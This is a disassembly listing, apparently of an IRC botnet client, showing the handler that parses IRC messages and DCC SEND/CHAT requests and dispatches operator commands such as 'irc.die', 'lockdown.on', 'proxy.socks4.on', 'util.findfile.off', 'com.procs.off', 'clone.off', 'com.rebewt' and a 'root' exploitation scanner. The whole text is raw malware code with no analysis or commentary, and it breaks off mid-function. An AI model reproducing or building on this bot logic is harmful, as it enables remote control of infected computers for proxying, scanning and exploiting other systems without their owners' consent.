loc_40FAC0: ; CODE XREF: sub_40F6F1+2F5�j
push esi
push offset aNick ; "NICK"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_40FC16
mov eax, [ebp+var_8C]
mov esi, [ebp+arg_18]
inc eax
mov [ebp+arg_0], 2
mov [ebp+arg_24], eax
loc_40FAE9: ; CODE XREF: sub_40F6F1+44A�j
lea eax, [ebp+var_AA8]
push eax
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FB36
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418630
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_1C], eax
jz short loc_40FB36
push [ebp+arg_24]
lea edi, [esi+2]
mov byte ptr [esi], 3Ah
lea eax, [edi-1]
push eax
call sub_417A00
push [ebp+arg_1C]
push edi
call sub_417A10
add esp, 10h
mov edi, 80h
loc_40FB36: ; CODE XREF: sub_40F6F1+409�j
; sub_40F6F1+420�j
add esi, edi
dec [ebp+arg_0]
jnz short loc_40FAE9
lea eax, [ebp+var_D8]
test eax, eax
jz loc_40FAB8
cmp [ebp+arg_24], ebx
jz loc_40FAB8
push [ebp+arg_10]
lea eax, [ebp+var_D8]
push eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FB7E
push 0Fh
push [ebp+arg_24]
push [ebp+arg_10]
call sub_4182F0
add esp, 0Ch
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_40FB7E: ; CODE XREF: sub_40F6F1+476�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40FB83: ; CODE XREF: sub_40F6F1+4B3�j
cmp [edi], bl
jz short loc_40FB9A
lea eax, [ebp+var_AA8]
push eax
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FBAB
loc_40FB9A: ; CODE XREF: sub_40F6F1+494�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40FB83
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_40FBAB: ; CODE XREF: sub_40F6F1+4A7�j
lea eax, [ebp+var_AA8]
push 21h
push eax
call sub_418630
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+arg_0], eax
jz loc_40FAB8
push eax
call sub_417AF0
push [ebp+arg_24]
mov edi, eax
call sub_417AF0
add edi, eax
pop ecx
cmp edi, 7Eh
pop ecx
ja loc_40FAB8
push [ebp+arg_0]
shl esi, 7
push [ebp+arg_24]
add esi, [ebp+arg_18]
push offset aSS_0 ; ":%s%s"
push esi
call sub_4173AC
push ebx
lea eax, [ebp+var_4C0]
push ebx
push eax
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40DC10
add esp, 24h
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_40FC16: ; CODE XREF: sub_40F6F1+3DE�j
push esi
push offset aPart ; "PART"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FC38
push esi
push offset aQuit ; "QUIT"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FC5F
loc_40FC38: ; CODE XREF: sub_40F6F1+534�j
mov edi, [ebp+arg_18]
xor esi, esi
loc_40FC3D: ; CODE XREF: sub_40F6F1+56C�j
cmp [edi], bl
jz short loc_40FC53
push [ebp+var_94]
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FCAD
loc_40FC53: ; CODE XREF: sub_40F6F1+54E�j
inc esi
add edi, 80h
cmp esi, 2
jl short loc_40FC3D
loc_40FC5F: ; CODE XREF: sub_40F6F1+545�j
push [ebp+var_90]
push offset a353 ; "353"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_40FD0E
push [ebp+var_84]
push [ebp+arg_8]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FC96
mov eax, [ebp+arg_20]
mov dword ptr [eax], 1
loc_40FC96: ; CODE XREF: sub_40F6F1+59A�j
push [ebp+var_84]
push offset dword_438168
loc_40FCA1: ; CODE XREF: sub_40F6F1+5C68�j
; sub_40F6F1+5FD5�j ...
call sub_40C56B
pop ecx
loc_40FCA7: ; CODE XREF: sub_40F6F1+60EB�j
pop ecx
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_40FCAD: ; CODE XREF: sub_40F6F1+560�j
mov eax, [ebp+arg_18]
shl esi, 7
mov [esi+eax], bl
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_438138
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
push [ebp+var_90]
push offset aPart ; "PART"
call sub_4177D0
add esp, 18h
test eax, eax
jnz loc_40FAB8
lea eax, [ebp+var_2DC]
push eax
mov eax, [ebp+var_94]
inc eax
push eax
push offset aNoticeSS ; "NOTICE %s :%s\r\n"
jmp loc_40FAAD
; ---------------------------------------------------------------------------
loc_40FD0E: ; CODE XREF: sub_40F6F1+582�j
push [ebp+var_90]
mov esi, offset aPrivmsg ; "PRIVMSG"
push esi
call sub_4177D0
pop ecx
mov edi, offset aNotice ; "NOTICE"
test eax, eax
pop ecx
jz short loc_40FD62
push [ebp+var_90]
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_40FD62
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_415956
cmp dword_42ECF0, ebx
jz loc_415956
loc_40FD62: ; CODE XREF: sub_40F6F1+637�j
; sub_40F6F1+649�j
push [ebp+var_90]
push esi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_40FEE8
push [ebp+var_90]
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_40FEE8
mov eax, [ebp+var_88]
inc [ebp+var_84]
push 4
mov [ebp+var_8C], eax
pop esi
mov [ebp+var_C0], esi
loc_40FDA9: ; CODE XREF: sub_40F6F1+8B3�j
; sub_40F6F1+944�j ...
shl esi, 2
mov eax, [ebp+esi+var_94]
lea edi, [ebp+esi+var_94]
push eax
push offset dword_43812C
mov [ebp+arg_8], eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4101E5
push [ebp+esi+var_90]
push offset aSend_0 ; "SEND"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4100AC
cmp [ebp+var_AC], ebx
jz loc_410082
push [ebp+esi+var_8C]
mov edi, offset dword_42433C
lea eax, [ebp+var_6F4]
push edi
push eax
call sub_4173AC
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push edi
push eax
call sub_4173AC
push [ebp+esi+var_84]
call sub_41791F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_4182F0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_4380E8
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416E58
add esp, 44h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40CE56
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz loc_410065
loc_40FED2: ; CODE XREF: sub_40F6F1+7F5�j
cmp [ebp+var_560], ebx
jnz loc_4100A4
push 32h
nop
call near ptr 7C802442h
jmp short loc_40FED2
; ---------------------------------------------------------------------------
loc_40FEE8: ; CODE XREF: sub_40F6F1+681�j
; sub_40F6F1+697�j
push [ebp+var_90]
push edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_40FF01
mov [ebp+var_4], 1
loc_40FF01: ; CODE XREF: sub_40F6F1+807�j
cmp [ebp+var_8C], ebx
jz loc_40FAB8
push offset dword_4380E4
push [ebp+var_8C]
call sub_417980
pop ecx
test eax, eax
pop ecx
jz short loc_40FF28
cmp [ebp+var_4], ebx
jz short loc_40FF34
loc_40FF28: ; CODE XREF: sub_40F6F1+830�j
lea eax, [ebp+var_D8]
mov [ebp+var_8C], eax
loc_40FF34: ; CODE XREF: sub_40F6F1+835�j
cmp [ebp+var_88], ebx
jz loc_40FAB8
inc [ebp+var_88]
jz short loc_40FF80
cmp [ebp+arg_10], ebx
jz short loc_40FF80
lea eax, [ebp+var_928]
push eax
call sub_417AF0
push eax
lea eax, [ebp+var_928]
push [ebp+var_88]
push eax
call sub_418480
mov esi, eax
add esp, 10h
neg esi
sbb esi, esi
add esi, 4
mov [ebp+var_C0], esi
jmp short loc_40FF86
; ---------------------------------------------------------------------------
loc_40FF80: ; CODE XREF: sub_40F6F1+855�j
; sub_40F6F1+85A�j
mov esi, [ebp+var_C0]
loc_40FF86: ; CODE XREF: sub_40F6F1+88D�j
mov edi, [ebp+esi*4+var_94]
cmp edi, ebx
jz loc_40FAB8
push edi
push offset dword_4380D8
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_40FDA9
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz short loc_410026
mov eax, dword_515650
mov eax, off_42EE40[eax*4]
cmp [eax], bl
jz short loc_410026
push eax
push ecx
push offset dword_4380BC
push [ebp+arg_4]
call sub_40DBCA
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset aSHasJustVersio ; "%s has just versioned me."
push eax
call sub_4173AC
lea eax, [ebp+var_2DC]
push eax
call sub_40C4F7
add esp, 20h
cmp [ebp+var_AC], ebx
jnz loc_40FAB8
push ebx
lea eax, [ebp+var_2DC]
push 1
push eax
push offset dword_51554C
push [ebp+arg_4]
loc_410019: ; CODE XREF: sub_40F6F1+59F7�j
call sub_40DC10
add esp, 14h
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_410026: ; CODE XREF: sub_40F6F1+8C2�j
; sub_40F6F1+8D2�j
push edi
push offset dword_438098
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_40FDA9
mov eax, [ebp+esi*4+var_90]
cmp eax, ebx
jz loc_40FDA9
loc_41004A: ; DATA XREF: ___:0042AC10�o
; ___:0042AC24�o
mov ecx, [ebp+var_8C]
cmp byte ptr [ecx], 23h
jz loc_40FDA9
push eax
push ecx
push offset dword_438080
jmp loc_40FAAD
; ---------------------------------------------------------------------------
loc_410065: ; CODE XREF: sub_40F6F1+7DB�j
nop
call near ptr 7C910331h
push eax
push offset dword_438038
loc_410071: ; CODE XREF: sub_40F6F1+ACD�j
; sub_40F6F1+ADE�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_4100A4
; ---------------------------------------------------------------------------
loc_410082: ; CODE XREF: sub_40F6F1+702�j
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push [ebp+esi+var_8C]
push offset dword_437FE8
push eax
call sub_4173AC
add esp, 10h
loc_4100A4: ; CODE XREF: sub_40F6F1+7E7�j
; sub_40F6F1+98F�j ...
push 1
pop esi
jmp loc_411A57
; ---------------------------------------------------------------------------
loc_4100AC: ; CODE XREF: sub_40F6F1+6F6�j
push [ebp+esi+var_90]
push offset aChat ; "CHAT"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_4101FB
cmp [ebp+var_AC], ebx
jz loc_4101D4
push 13h
call sub_4170A0
test eax, eax
pop ecx
jnz loc_4101C3
push [ebp+esi+var_88]
lea eax, [ebp+var_708]
push offset dword_42433C
push eax
call sub_4173AC
push [ebp+esi+var_84]
call sub_41791F
mov [ebp+var_570], eax
mov eax, [ebp+arg_4]
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push 7Fh
push eax
lea eax, [ebp+var_5F0]
push eax
call sub_4182F0
mov eax, [ebp+var_4]
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_2DC]
push offset dword_437FB0
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_2DC]
push 13h
push eax
call sub_416E58
add esp, 34h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C8F3
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4101B2
loc_41019C: ; CODE XREF: sub_40F6F1+ABF�j
cmp [ebp+var_560], ebx
jnz loc_4100A4
push 32h
nop
call near ptr 7C802442h
jmp short loc_41019C
; ---------------------------------------------------------------------------
loc_4101B2: ; CODE XREF: sub_40F6F1+AA9�j
nop
call near ptr 7C910331h
push eax
push offset dword_437F6C
jmp loc_410071
; ---------------------------------------------------------------------------
loc_4101C3: ; CODE XREF: sub_40F6F1+9EC�j
lea eax, [ebp+var_D8]
push eax
push offset dword_437F2C
jmp loc_410071
; ---------------------------------------------------------------------------
loc_4101D4: ; CODE XREF: sub_40F6F1+9DC�j
lea eax, [ebp+var_D8]
push eax
push offset dword_437EEC
jmp loc_410071
; ---------------------------------------------------------------------------
loc_4101E5: ; CODE XREF: sub_40F6F1+6DB�j
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
mov al, [eax]
cmp al, byte_42ECF8
mov [edi], ecx
jnz loc_40FAB8
loc_4101FB: ; CODE XREF: sub_40F6F1+9D0�j
mov edi, [edi]
push edi
push offset aIrc_activate ; "irc.activate"
mov [ebp+arg_8], edi
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41595E
push edi
push offset aIrc_act ; "irc.act"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41595E
cmp [ebp+var_AC], ebx
jnz short loc_41024C
push [ebp+var_90]
push offset dword_438134
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz loc_415956
loc_41024C: ; CODE XREF: sub_40F6F1+B3F�j
cmp [ebp+arg_28], ebx
jnz loc_415956
xor edi, edi
cmp dword_430B28, ebx
jle loc_4103F8
mov [ebp+arg_20], offset dword_446090
loc_41026A: ; CODE XREF: sub_40F6F1+B98�j
push [ebp+arg_8]
push [ebp+arg_20]
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz short loc_410290
add [ebp+arg_20], 0B8h
inc edi
cmp edi, dword_430B28
jl short loc_41026A
jmp loc_4103F8
; ---------------------------------------------------------------------------
loc_410290: ; CODE XREF: sub_40F6F1+B88�j
push offset asc_438244 ; " :"
push [ebp+arg_0]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz loc_40FAB8
mov cl, byte_42ECF8
imul edi, 0B8h
mov [eax+2], cl
mov cl, byte_42ECF8
mov [eax+3], cl
lea ecx, dword_4460A8[edi]
push 9Fh
add eax, 4
push ecx
push eax
call sub_4182F0
lea eax, [ebp+esi+var_54]
add esp, 0Ch
mov [ebp+arg_20], 0Fh
mov [ebp+arg_C], eax
loc_4102E5: ; CODE XREF: sub_40F6F1+C9C�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD_0 ; "$%d-"
push eax
call sub_4173AC
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417980
add esp, 14h
test eax, eax
jz short loc_410351
mov eax, [ebp+arg_C]
cmp [eax], ebx
jz short loc_410351
lea eax, dword_446090[edi]
push eax
call sub_417AF0
add [ebp+var_C], eax
pop ecx
jz short loc_410383
mov eax, [ebp+arg_C]
push dword ptr [eax-4]
push [ebp+var_C]
call sub_417980
pop ecx
cmp eax, ebx
pop ecx
jz short loc_410383
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A74C
add esp, 0Ch
jmp short loc_410383
; ---------------------------------------------------------------------------
loc_410351: ; CODE XREF: sub_40F6F1+C1C�j
; sub_40F6F1+C23�j
mov eax, [ebp+arg_C]
cmp [eax], ebx
jnz short loc_410383
lea eax, [ebp+var_B8]
push 2
push eax
lea eax, [ebp+var_14]
push eax
call sub_4182F0
lea eax, [ebp+var_14]
mov [ebp+var_12], bl
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A74C
add esp, 18h
loc_410383: ; CODE XREF: sub_40F6F1+C35�j
; sub_40F6F1+C49�j ...
dec [ebp+arg_20]
sub [ebp+arg_C], 4
cmp [ebp+arg_20], ebx
jg loc_4102E5
lea eax, [ebp+esi+var_54]
mov [ebp+arg_20], 10h
mov edi, eax
loc_4103A0: ; CODE XREF: sub_40F6F1+CFB�j
push [ebp+arg_20]
lea eax, [ebp+var_B8]
push offset aD ; "$%d"
push eax
call sub_4173AC
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_417980
add esp, 14h
test eax, eax
jz short loc_4103E3
mov eax, [edi]
cmp eax, ebx
jz short loc_4103E3
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A74C
add esp, 0Ch
loc_4103E3: ; CODE XREF: sub_40F6F1+CD7�j
; sub_40F6F1+CDD�j
dec [ebp+arg_20]
sub edi, 4
cmp [ebp+arg_20], ebx
jg short loc_4103A0
mov [ebp+var_DC], 1
loc_4103F8: ; CODE XREF: sub_40F6F1+B6C�j
; sub_40F6F1+B9A�j
mov eax, [ebp+arg_8]
mov edi, [ebp+arg_4]
mov al, [eax]
cmp al, byte_42ECF8
jz short loc_410414
cmp [ebp+var_DC], ebx
jz loc_410612
loc_410414: ; CODE XREF: sub_40F6F1+D15�j
push [ebp+arg_10]
push offset aMe_0 ; "$me"
push [ebp+arg_0]
call sub_40A74C
lea eax, [ebp+var_D8]
push eax
push offset aUser_3 ; "$user"
push [ebp+arg_0]
call sub_40A74C
push [ebp+var_8C]
push offset aChan ; "$chan"
push [ebp+arg_0]
call sub_40A74C
push ebx
push ebx
lea eax, [ebp+var_B8]
push 1
push eax
push edi
call sub_4162D6
push eax
push offset aRndnick ; "$rndnick"
push [ebp+arg_0]
call sub_40A74C
add esp, 44h
push [ebp+arg_14]
push offset aServer_1 ; "$server"
push [ebp+arg_0]
call sub_40A74C
push offset aChr ; "$chr("
push [ebp+arg_0]
call sub_417980
add esp, 14h
loc_41048D: ; CODE XREF: sub_40F6F1+E90�j
test eax, eax
jz loc_410586
push offset aChr ; "$chr("
push [ebp+arg_0]
call sub_417980
mov [ebp+arg_10], eax
add eax, 5
push 4
push eax
lea eax, [ebp+var_B8]
push eax
call sub_4182F0
lea eax, [ebp+var_B8]
push offset asc_437E94 ; ")"
push eax
call sub_41824D
add esp, 1Ch
cmp [ebp+var_B8], 30h
jl short loc_4104DD
cmp [ebp+var_B8], 39h
jle short loc_4104F3
loc_4104DD: ; CODE XREF: sub_40F6F1+DE1�j
push 3
lea eax, [ebp+var_B8]
push offset a63 ; "63"
push eax
call sub_4182F0
add esp, 0Ch
loc_4104F3: ; CODE XREF: sub_40F6F1+DEA�j
lea eax, [ebp+var_B8]
push eax
call sub_41791F
test eax, eax
pop ecx
jle short loc_410516
lea eax, [ebp+var_B8]
push eax
call sub_41791F
pop ecx
mov [ebp+var_14], al
jmp short loc_410527
; ---------------------------------------------------------------------------
loc_410516: ; CODE XREF: sub_40F6F1+E11�j
call sub_417408
push 60h
cdq
pop ecx
idiv ecx
add dl, 20h
mov [ebp+var_14], dl
loc_410527: ; CODE XREF: sub_40F6F1+E23�j
lea eax, [ebp+var_B8]
mov [ebp+var_13], bl
push eax
call sub_417AF0
mov [ebp+arg_20], eax
push 0Ch
lea eax, [ebp+var_B8]
push ebx
push eax
call sub_417430
mov eax, [ebp+arg_20]
add eax, 6
push eax
lea eax, [ebp+var_B8]
push [ebp+arg_10]
push eax
call sub_4182F0
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+arg_0]
call sub_40A74C
push offset aChr ; "$chr("
push [ebp+arg_0]
call sub_417980
add esp, 30h
jmp loc_41048D
; ---------------------------------------------------------------------------
loc_410586: ; CODE XREF: sub_40F6F1+D9E�j
push 1FFh
lea eax, [ebp+var_FB0]
push [ebp+arg_0]
push eax
call sub_4182F0
lea eax, [ebp+var_FB0]
push 1FFh
push eax
lea eax, [ebp+var_11B0]
push eax
call sub_4182F0
lea eax, [ebp+var_11B0]
push offset asc_428300 ; " "
push eax
call sub_41824D
mov [ebp+var_94], eax
lea eax, [ebp+var_90]
add esp, 20h
mov [ebp+arg_10], eax
mov [ebp+arg_8], 1Fh
loc_4105DC: ; CODE XREF: sub_40F6F1+F04�j
push offset asc_428300 ; " "
push ebx
call sub_41824D
pop ecx
pop ecx
mov ecx, [ebp+arg_10]
add [ebp+arg_10], 4
dec [ebp+arg_8]
mov [ecx], eax
jnz short loc_4105DC
mov ecx, [ebp+esi+var_94]
lea eax, [ebp+esi+var_94]
cmp ecx, ebx
jz loc_40FAB8
add ecx, 3
mov [eax], ecx
loc_410612: ; CODE XREF: sub_40F6F1+D1D�j
mov eax, [ebp+esi+var_94]
push eax
push offset aIrc_rndnick ; "irc.rndnick"
mov [ebp+arg_8], eax
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41590A
push [ebp+arg_8]
push offset aRn ; "rn"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41590A
push [ebp+arg_8]
push offset aIrc_die ; "irc.die"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4158E8
push [ebp+arg_8]
push offset aIrc_di ; "irc.di"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4158E8
push [ebp+arg_8]
push offset aIrc_logout ; "irc.logout"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41581A
push [ebp+arg_8]
push offset aLo ; "lo"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41581A
push [ebp+arg_8]
push offset aIrc_version ; "irc.version"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4157E1
push [ebp+arg_8]
push offset aVer ; "ver"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4157E1
push [ebp+arg_8]
push offset aLockdown_on ; "lockdown.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4156CB
push [ebp+arg_8]
push offset aLd_on ; "ld.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4156CB
push [ebp+arg_8]
push offset aLockdown_off ; "lockdown.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4156CB
push [ebp+arg_8]
push offset aLd_off ; "ld.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4156CB
push [ebp+arg_8]
push offset aProxy_socks4_o ; "proxy.socks4.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4155A2
push [ebp+arg_8]
push offset aProxy_s4_on ; "proxy.s4.on"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4155A2
push [ebp+arg_8]
push offset aProxy_socks4_0 ; "proxy.socks4.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41079C
push [ebp+esi+var_90]
push 11h
push offset aServer ; "Server"
push offset dword_437DDC
loc_410782: ; CODE XREF: sub_40F6F1+10D1�j
; sub_40F6F1+10F9�j ...
push [ebp+var_8]
push [ebp+var_4]
push [ebp+var_8C]
push edi
loc_41078F: ; CODE XREF: sub_40F6F1+48E0�j
call sub_4170E6
add esp, 20h
jmp loc_40FAB8
; ---------------------------------------------------------------------------
loc_41079C: ; CODE XREF: sub_40F6F1+107C�j
push [ebp+arg_8]
push offset dword_437DCC
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4107C4
push [ebp+esi+var_90]
push 3
push offset aServer ; "Server"
push offset dword_437DC0
jmp short loc_410782
; ---------------------------------------------------------------------------
loc_4107C4: ; CODE XREF: sub_40F6F1+10BC�j
push [ebp+arg_8]
push offset dword_437DB8
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4107EC
push [ebp+esi+var_90]
push 1Dh
push offset dword_437DAC
push offset dword_437DA0
jmp short loc_410782
; ---------------------------------------------------------------------------
loc_4107EC: ; CODE XREF: sub_40F6F1+10E4�j
push [ebp+arg_8]
push offset aProxy_redirect ; "proxy.redirect.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410817
push [ebp+esi+var_90]
push 10h
push offset dword_437D7C
push offset dword_437D6C
jmp loc_410782
; ---------------------------------------------------------------------------
loc_410817: ; CODE XREF: sub_40F6F1+110C�j
push [ebp+arg_8]
push offset dword_437D60
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410842
push [ebp+esi+var_90]
push 0Ah
push offset dword_437D54
push offset dword_437D48
jmp loc_410782
; ---------------------------------------------------------------------------
loc_410842: ; CODE XREF: sub_40F6F1+1137�j
push [ebp+arg_8]
push offset dword_437D38
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_41086D
push [ebp+esi+var_90]
push 0Bh
push offset dword_437D2C
push offset dword_437D20
jmp loc_410782
; ---------------------------------------------------------------------------
loc_41086D: ; CODE XREF: sub_40F6F1+1162�j
push [ebp+arg_8]
push offset dword_437D10
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410898
push [ebp+esi+var_90]
push 0Fh
push offset dword_437D04
push offset dword_437CF8
jmp loc_410782
; ---------------------------------------------------------------------------
loc_410898: ; CODE XREF: sub_40F6F1+118D�j
push [ebp+arg_8]
push offset dword_437CE8
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4108C3
push [ebp+esi+var_90]
push 0Eh
push offset dword_437CDC
push offset dword_437CD0
jmp loc_410782
; ---------------------------------------------------------------------------
loc_4108C3: ; CODE XREF: sub_40F6F1+11B8�j
push [ebp+arg_8]
push offset aDaemon_tftp_of ; "daemon.tftp.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4108EE
push [ebp+esi+var_90]
push 4
push offset aServer ; "Server"
push offset dword_437CB4
jmp loc_410782
; ---------------------------------------------------------------------------
loc_4108EE: ; CODE XREF: sub_40F6F1+11E3�j
push [ebp+arg_8]
push offset aUtil_findfile_ ; "util.findfile.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41558A
push [ebp+arg_8]
push offset aUtil_ff_off ; "util.ff.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41558A
push [ebp+arg_8]
push offset aCom_procs_off ; "com.procs.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415572
push [ebp+arg_8]
push offset aCom_ps_off ; "com.ps.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_415572
push [ebp+arg_8]
push offset aClone_off ; "clone.off"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410975
push [ebp+esi+var_90]
push 18h
push offset aClone ; "Clone"
push offset dword_437C54
jmp loc_410782
; ---------------------------------------------------------------------------
loc_410975: ; CODE XREF: sub_40F6F1+126A�j
push [ebp+arg_8]
push offset aLockdown_stop ; "lockdown.stop"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4109A0
push [ebp+esi+var_90]
push 1Ah
push offset aSecure_0 ; "Secure"
push offset dword_437C2C
jmp loc_410782
; ---------------------------------------------------------------------------
loc_4109A0: ; CODE XREF: sub_40F6F1+1295�j
push [ebp+arg_8]
push offset aRoot_stop ; "root.stop"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_4109CB
push [ebp+esi+var_90]
push 8
push offset aScan ; "Scan"
push offset aExploitation ; "Exploitation"
jmp loc_410782
; ---------------------------------------------------------------------------
loc_4109CB: ; CODE XREF: sub_40F6F1+12C0�j
push [ebp+arg_8]
push offset aRoot_stats ; "root.stats"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41555E
push [ebp+arg_8]
push offset aRoot_st ; "root.st"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41555E
push [ebp+arg_8]
push offset aIrc_reconnect ; "irc.reconnect"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41553F
push [ebp+arg_8]
push offset aIrc_r ; "irc.r"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41553F
push [ebp+arg_8]
push offset aIrc_disconnect ; "irc.disconnect"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41551F
push [ebp+arg_8]
push offset aIrc_d ; "irc.d"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41551F
push [ebp+arg_8]
push offset aIrc_quit ; "irc.quit"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4154DB
push [ebp+arg_8]
push offset aIrc_q ; "irc.q"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_4154DB
push [ebp+arg_8]
push offset aIrc_status ; "irc.status"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41549F
push [ebp+arg_8]
push offset aIrc_s ; "irc.s"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41549F
push [ebp+arg_8]
push offset aIrc_id ; "irc.id"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41546A
push [ebp+arg_8]
push offset aIrc_i ; "irc.i"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jz loc_41546A
push [ebp+arg_8]
push offset aCom_rebewt ; "com.rebewt"
call sub_4177D0
pop ecx
test eax, eax
pop ecx
jnz short loc_410B31
call sub_40AB95
test eax, eax
mov eax, offset dword_437B54
jnz short loc_410B05
mov eax, offset dword_437B20
